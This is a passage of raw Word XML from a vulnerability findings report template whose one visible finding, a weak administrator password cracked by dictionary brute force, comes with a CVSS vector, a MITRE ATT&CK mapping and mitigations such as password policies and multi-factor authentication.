          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
    </w:p>
    <w:p w:rsidR="0D325B6E" w:rsidP="0D325B6E" w:rsidRDefault="0D325B6E" w14:paraId="2EB19500" w14:textId="4D69360B">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187D3513" w14:textId="51C9D24E">
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:spacing w:before="0" w:beforeAutospacing="off" w:after="0" w:afterAutospacing="off"/>
        <w:ind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3ED470D3" w14:textId="08BF95FC">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:spacing w:before="0" w:beforeAutospacing="off" w:after="0" w:afterAutospacing="off"/>
        <w:ind w:left="24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04874AEE" w14:textId="3B83AABD">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:spacing w:before="0" w:beforeAutospacing="off" w:after="0" w:afterAutospacing="off"/>
        <w:ind w:left="24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C61F8BA" w14:textId="4051CBE7">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:spacing w:before="0" w:beforeAutospacing="off" w:after="0" w:afterAutospacing="off"/>
        <w:ind w:left="24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63DCA9C1" w14:textId="34D74502">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:spacing w:before="0" w:beforeAutospacing="off" w:after="0" w:afterAutospacing="off"/>
        <w:ind w:left="240" w:right="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Noto Sans" w:hAnsi="Noto Sans" w:eastAsia="Noto Sans" w:cs="Noto Sans"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:noProof w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="0D325B6E" w:rsidP="0D325B6E" w:rsidRDefault="0D325B6E" w14:paraId="77FABC6F" w14:textId="0DCC4017">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="0D325B6E" w:rsidP="0D325B6E" w:rsidRDefault="0D325B6E" w14:paraId="24BA435D" w14:textId="013E3353">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="0D325B6E" w:rsidP="0D325B6E" w:rsidRDefault="0D325B6E" w14:paraId="5D91BD2F" w14:textId="221EE621">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="0D325B6E" w:rsidP="0D325B6E" w:rsidRDefault="0D325B6E" w14:paraId="55FA70DB" w14:textId="4A3D9225">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="0D325B6E" w:rsidP="0D325B6E" w:rsidRDefault="0D325B6E" w14:paraId="49522B86" w14:textId="19F30DE8">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w:rsidP="0D325B6E" wp14:paraId="0B001318" wp14:textId="4C7D1FC2">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" wp14:paraId="28A78ADE" wp14:textId="3CBADAA2">
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w:rsidP="0D325B6E" wp14:paraId="2C078E63" wp14:textId="1BBA7650">
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r w:rsidR="09CBA97A">
        <w:rPr/>
        <w:t>Vulnerability Technical Findings Templates</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="09CBA97A" w:rsidP="0D325B6E" w:rsidRDefault="09CBA97A" w14:paraId="243E79EB" w14:textId="70E6C140">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos" w:eastAsia="Aptos" w:cs="Aptos"/>
          <w:noProof w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidR="09CBA97A">
        <w:rPr/>
        <w:t>Critical:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="738D7CE8" w:rsidP="0D325B6E" w:rsidRDefault="738D7CE8" w14:paraId="75490A39" w14:textId="3B75D6E3">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos" w:eastAsia="Aptos" w:cs="Aptos"/>
          <w:noProof w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:name="_Toc466746969" w:id="748255575"/>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="738D7CE8">
        <w:rPr>
          <w:noProof w:val="0"/>
          <w:color w:val="660000"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>▌</w:t>
      </w:r>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="738D7CE8">
        <w:rPr>
          <w:noProof w:val="0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>C1: Weak Administrator Password</w:t>
      </w:r>
      <w:bookmarkEnd w:id="74825557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14D5037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98502E4" w14:textId="19E2A23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F27433" w14:textId="4B74FDA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754CDE" w14:textId="37D49D1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68AB47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6C9EA7" w14:textId="66D9EE9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26868B60" w:rsidP="0D325B6E" w:rsidRDefault="26868B60" w14:paraId="0C6765D5" w14:textId="5CAFA270">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26868B60">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69EDC28" w:rsidP="0D325B6E" w:rsidRDefault="669EDC28" w14:paraId="73FD4AD6" w14:textId="54D5F096">
            <w:pPr>
              <w:pStyle w:val="Normal"/>
              <w:suppressLineNumbers w:val="0"/>
              <w:spacing w:before="0" w:beforeAutospacing="off" w:after="0" w:afterAutospacing="off" w:line="279" w:lineRule="auto"/>
              <w:ind w:left="0" w:right="0"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:noProof w:val="0"/>
                <w:color w:val="5D0E07"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="0D325B6E" w:rsidR="669EDC28">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                <w:b w:val="1"/>
                <w:bCs w:val="1"/>
                <w:i w:val="0"/>
                <w:iCs w:val="0"/>
                <w:caps w:val="0"/>
                <w:smallCaps w:val="0"/>
                <w:color w:val="FFFFFF" w:themeColor="background1" w:themeTint="FF" w:themeShade="FF"/>
                <w:sz w:val="60"/>
                <w:szCs w:val="60"/>
              </w:rPr>
              <w:t>9.</w:t>
            </w:r>
            <w:r w:rsidRPr="0D325B6E" w:rsidR="13E1DE16">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829CF3A" w14:textId="30E4167B">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613D4EC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B1A82D" w14:textId="21F135F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E611472" w:rsidP="0D325B6E" w:rsidRDefault="0E611472" w14:paraId="34180844" w14:textId="42526138">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E611472">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249E6BE"/>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4350" w:type="dxa"/>
            <w:vMerge/>
            <w:tcBorders>
              <w:top w:sz="0"/>
              <w:left w:val="single" w:color="000000" w:themeColor="text1" w:sz="0"/>
              <w:bottom w:val="single" w:color="000000" w:themeColor="text1" w:sz="0"/>
              <w:right w:val="single" w:color="000000" w:themeColor="text1" w:sz="0"/>
            </w:tcBorders>
            <w:tcMar/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="4A5F3154"/>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0D325B6E" w:rsidTr="0D325B6E" w14:paraId="0A2922F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558A6A" w14:textId="09E4EB0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614D229" w:rsidP="0D325B6E" w:rsidRDefault="5614D229" w14:paraId="21930093" w14:textId="47943865">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N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N" r:id="Rdab672219c8f4a76">
              <w:r w:rsidRPr="0D325B6E" w:rsidR="5614D229">
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                  <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                  <w:b w:val="0"/>
                  <w:bCs w:val="0"/>
                  <w:i w:val="0"/>
                  <w:iCs w:val="0"/>
                  <w:strike w:val="0"/>
                  <w:dstrike w:val="0"/>
                  <w:noProof w:val="0"/>
                  <w:color w:val="0070C0"/>
                  <w:sz w:val="22"/>
                  <w:szCs w:val="22"/>
                  <w:lang w:val="fr-FR"/>
                </w:rPr>
                <w:t>AV:N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AC:L</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AT:N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PR:N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UI:N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VC:</w:t>
              </w:r>
              <w:r w:rsidRPr="0D325B6E" w:rsidR="5614D229">
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                  <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                  <w:b w:val="0"/>
                  <w:bCs w:val="0"/>
                  <w:i w:val="0"/>
                  <w:iCs w:val="0"/>
                  <w:strike w:val="0"/>
                  <w:dstrike w:val="0"/>
                  <w:noProof w:val="0"/>
                  <w:color w:val="0070C0"/>
                  <w:sz w:val="22"/>
                  <w:szCs w:val="22"/>
                  <w:lang w:val="fr-FR"/>
                </w:rPr>
                <w:t>H/</w:t>
              </w:r>
              <w:r w:rsidRPr="0D325B6E" w:rsidR="5614D229">
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                  <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                  <w:b w:val="0"/>
                  <w:bCs w:val="0"/>
                  <w:i w:val="0"/>
                  <w:iCs w:val="0"/>
                  <w:strike w:val="0"/>
                  <w:dstrike w:val="0"/>
                  <w:noProof w:val="0"/>
                  <w:color w:val="0070C0"/>
                  <w:sz w:val="22"/>
                  <w:szCs w:val="22"/>
                  <w:lang w:val="fr-FR"/>
                </w:rPr>
                <w:t>VI:</w:t>
              </w:r>
              <w:r w:rsidRPr="0D325B6E" w:rsidR="5614D229">
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                  <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                  <w:b w:val="0"/>
                  <w:bCs w:val="0"/>
                  <w:i w:val="0"/>
                  <w:iCs w:val="0"/>
                  <w:strike w:val="0"/>
                  <w:dstrike w:val="0"/>
                  <w:noProof w:val="0"/>
                  <w:color w:val="0070C0"/>
                  <w:sz w:val="22"/>
                  <w:szCs w:val="22"/>
                  <w:lang w:val="fr-FR"/>
                </w:rPr>
                <w:t>H/</w:t>
              </w:r>
              <w:r w:rsidRPr="0D325B6E" w:rsidR="5614D229">
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                  <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                  <w:b w:val="0"/>
                  <w:bCs w:val="0"/>
                  <w:i w:val="0"/>
                  <w:iCs w:val="0"/>
                  <w:strike w:val="0"/>
                  <w:dstrike w:val="0"/>
                  <w:noProof w:val="0"/>
                  <w:color w:val="0070C0"/>
                  <w:sz w:val="22"/>
                  <w:szCs w:val="22"/>
                  <w:lang w:val="fr-FR"/>
                </w:rPr>
                <w:t>VA:</w:t>
              </w:r>
              <w:r w:rsidRPr="0D325B6E" w:rsidR="5614D229">
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                  <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                  <w:b w:val="0"/>
                  <w:bCs w:val="0"/>
                  <w:i w:val="0"/>
                  <w:iCs w:val="0"/>
                  <w:strike w:val="0"/>
                  <w:dstrike w:val="0"/>
                  <w:noProof w:val="0"/>
                  <w:color w:val="0070C0"/>
                  <w:sz w:val="22"/>
                  <w:szCs w:val="22"/>
                  <w:lang w:val="fr-FR"/>
                </w:rPr>
                <w:t>H/</w:t>
              </w:r>
              <w:r w:rsidRPr="0D325B6E" w:rsidR="5614D229">
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                  <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                  <w:b w:val="0"/>
                  <w:bCs w:val="0"/>
                  <w:i w:val="0"/>
                  <w:iCs w:val="0"/>
                  <w:strike w:val="0"/>
                  <w:dstrike w:val="0"/>
                  <w:noProof w:val="0"/>
                  <w:color w:val="0070C0"/>
                  <w:sz w:val="22"/>
                  <w:szCs w:val="22"/>
                  <w:lang w:val="fr-FR"/>
                </w:rPr>
                <w:t>SC:N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SI:N</w:t>
              </w:r>
              <w:r w:rsidRPr="0D325B6E" w:rsidR="5614D229">
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                  <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                  <w:b w:val="0"/>
                  <w:bCs w:val="0"/>
                  <w:i w:val="0"/>
                  <w:iCs w:val="0"/>
                  <w:strike w:val="0"/>
                  <w:dstrike w:val="0"/>
                  <w:noProof w:val="0"/>
                  <w:color w:val="0070C0"/>
                  <w:sz w:val="22"/>
                  <w:szCs w:val="22"/>
                  <w:lang w:val="fr-FR"/>
                </w:rPr>
                <w:t>/</w:t>
              </w:r>
              <w:r w:rsidRPr="0D325B6E" w:rsidR="5614D229">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068DABDC">
        <w:trPr>
          <w:trHeight w:val="728"/>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9C3E4B" w14:textId="189EA2A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E0E2D87" w:rsidP="0D325B6E" w:rsidRDefault="1E0E2D87" w14:paraId="77EA3A48" w14:textId="7220FC42">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1E0E2D87">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319A317" w:rsidP="0D325B6E" w:rsidRDefault="7319A317" w14:paraId="7A6DA411" w14:textId="7F07A17F">
            <w:pPr>
              <w:pStyle w:val="Normal"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos" w:eastAsia="Aptos" w:cs="Aptos"/>
                <w:noProof w:val="0"/>
                <w:color w:val="0070C0"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:u w:val="single"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:hyperlink r:id="R16f4f958310d4817">
              <w:r w:rsidRPr="0D325B6E" w:rsidR="7319A317">
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                  <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                  <w:b w:val="0"/>
                  <w:bCs w:val="0"/>
                  <w:i w:val="0"/>
                  <w:iCs w:val="0"/>
                  <w:strike w:val="0"/>
                  <w:dstrike w:val="0"/>
                  <w:noProof w:val="0"/>
                  <w:color w:val="0070C0"/>
                  <w:sz w:val="22"/>
                  <w:szCs w:val="22"/>
                  <w:u w:val="single"/>
                  <w:lang w:val="en-US"/>
                </w:rPr>
                <w:t>T1110.003: Password Spraying</w:t>
              </w:r>
            </w:hyperlink>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0D325B6E" w:rsidTr="0D325B6E" w14:paraId="78BAC76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D1594AD"/>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0B4498A" w:rsidP="0D325B6E" w:rsidRDefault="40B4498A" w14:paraId="77057F3C" w14:textId="5ACC44B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40B4498A">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:i w:val="0"/>
                <w:iCs w:val="0"/>
                <w:caps w:val="0"/>
                <w:smallCaps w:val="0"/>
                <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Mitigation</w:t>
            </w:r>
            <w:r w:rsidRPr="0D325B6E" w:rsidR="40B4498A">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:i w:val="0"/>
                <w:iCs w:val="0"/>
                <w:caps w:val="0"/>
                <w:smallCaps w:val="0"/>
                <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>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2132F1" w:rsidP="0D325B6E" w:rsidRDefault="262132F1" w14:paraId="5872F5A6" w14:textId="5F39245B">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e2f57a91dc3e4bb3">
              <w:r w:rsidRPr="0D325B6E" w:rsidR="262132F1">
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                  <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                  <w:b w:val="0"/>
                  <w:bCs w:val="0"/>
                  <w:i w:val="0"/>
                  <w:iCs w:val="0"/>
                  <w:strike w:val="0"/>
                  <w:dstrike w:val="0"/>
                  <w:noProof w:val="0"/>
                  <w:color w:val="0070C0"/>
                  <w:sz w:val="22"/>
                  <w:szCs w:val="22"/>
                  <w:lang w:val="en-US"/>
                </w:rPr>
                <w:t>M1027: Password Policies</w:t>
              </w:r>
            </w:hyperlink>
          </w:p>
          <w:p w:rsidR="15193662" w:rsidP="0D325B6E" w:rsidRDefault="15193662" w14:paraId="322D4F90" w14:textId="76DF28FA">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6ae11722d7e14b64">
              <w:r w:rsidRPr="0D325B6E" w:rsidR="15193662">
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                  <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                  <w:b w:val="0"/>
                  <w:bCs w:val="0"/>
                  <w:i w:val="0"/>
                  <w:iCs w:val="0"/>
                  <w:strike w:val="0"/>
                  <w:dstrike w:val="0"/>
                  <w:noProof w:val="0"/>
                  <w:color w:val="0070C0"/>
                  <w:sz w:val="22"/>
                  <w:szCs w:val="22"/>
                  <w:lang w:val="en-US"/>
                </w:rPr>
                <w:t>M1032: Multi-Factor Authentication</w:t>
              </w:r>
            </w:hyperlink>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0D325B6E" w:rsidTr="0D325B6E" w14:paraId="7C7C49F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FD0273B" w:rsidP="0D325B6E" w:rsidRDefault="6FD0273B" w14:paraId="2C5FE253" w14:textId="4BD4345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6FD0273B">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3493D1B" w14:textId="0FCE3CC2">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3C45390" w14:textId="5E53DC33">
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:bidi w:val="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="13F1E2B4" w:rsidP="0D325B6E" w:rsidRDefault="13F1E2B4" w14:paraId="6CFE8A7E" w14:textId="141B1AFC">
      <w:pPr>
        <w:pStyle w:val="Normal"/>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F1E2B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3F1E2B4" w:rsidP="0D325B6E" w:rsidRDefault="13F1E2B4" w14:paraId="3FB0D52C" w14:textId="20FA9B5F">
      <w:pPr>
        <w:spacing w:before="0" w:beforeAutospacing="off" w:after="0" w:afterAutospacing="off"/>
      </w:pP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The </w:t>
      </w:r>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="13F1E2B4">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affected host's admin local user account</w:t>
      </w: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was found to be using a weak password that was successfully guessed using a dictionary-based brute force password attack. This </w:t>
      </w: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led</w:t>
      </w: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to </w:t>
      </w:r>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="45B97226">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:strike w:val="0"/>
          <w:dstrike w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:u w:val="none"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>the compromise</w:t>
      </w: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of the </w:t>
      </w:r>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="13F1E2B4">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admin account</w:t>
      </w:r>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="13F1E2B4">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:strike w:val="0"/>
          <w:dstrike w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:u w:val="none"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0D325B6E" w:rsidP="0D325B6E" w:rsidRDefault="0D325B6E" w14:paraId="010B6BDB" w14:textId="340DCFD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3F1E2B4" w:rsidP="0D325B6E" w:rsidRDefault="13F1E2B4" w14:paraId="60FB2D71" w14:textId="57892B8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F1E2B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6C25059" w:rsidP="0D325B6E" w:rsidRDefault="06C25059" w14:paraId="52D687AC" w14:textId="24817CE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6C25059">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as an attacker with administrative privileges on the host can disrupt systems. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0D325B6E" w:rsidP="0D325B6E" w:rsidRDefault="0D325B6E" w14:paraId="25E09700" w14:textId="0978634C">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3F1E2B4" w:rsidP="0D325B6E" w:rsidRDefault="13F1E2B4" w14:paraId="65030B91" w14:textId="7F6E894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F1E2B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2E228736" w14:textId="3E4E6C25">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3F1E2B4" w:rsidP="0D325B6E" w:rsidRDefault="13F1E2B4" w14:paraId="130E40A8" w14:textId="38804CC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F1E2B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E0AE766" w:rsidP="0D325B6E" w:rsidRDefault="0E0AE766" w14:paraId="2C2D6031" w14:textId="3A2F0DF3">
      <w:p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0AE76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E0AE76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1E618413">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1E618413" w:rsidP="0D325B6E" w:rsidRDefault="1E618413" w14:paraId="7AF0FC29" w14:textId="02FAA94D">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="30"/>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E618413">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Implement</w:t>
      </w:r>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="0E0AE766">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> and enforc</w:t>
      </w:r>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="6BB6F52B">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0E0AE766">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> a strong password policy</w:t>
      </w:r>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="38F0675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E0AE766">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">for all accounts </w:t>
      </w:r>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="40F2BA21">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">to ensure attackers are </w:t>
      </w:r>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="025AA175">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>unable</w:t>
      </w:r>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="40F2BA21">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> easily brute force passwords</w:t>
      </w:r>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="152CF2AD">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1B2D38A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B2D38AF">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>As a baseline the following minimum password policy is recommended:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="1B2D38AF" w:rsidP="0D325B6E" w:rsidRDefault="1B2D38AF" w14:paraId="3A85A6A7" w14:textId="07F9D4EF">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="30"/>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B2D38AF">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1B2D38AF" w:rsidP="0D325B6E" w:rsidRDefault="1B2D38AF" w14:paraId="4277F646" w14:textId="6943C8B2">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="30"/>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B2D38AF">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1B2D38AF" w:rsidP="0D325B6E" w:rsidRDefault="1B2D38AF" w14:paraId="4950CEA1" w14:textId="215D39EC">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
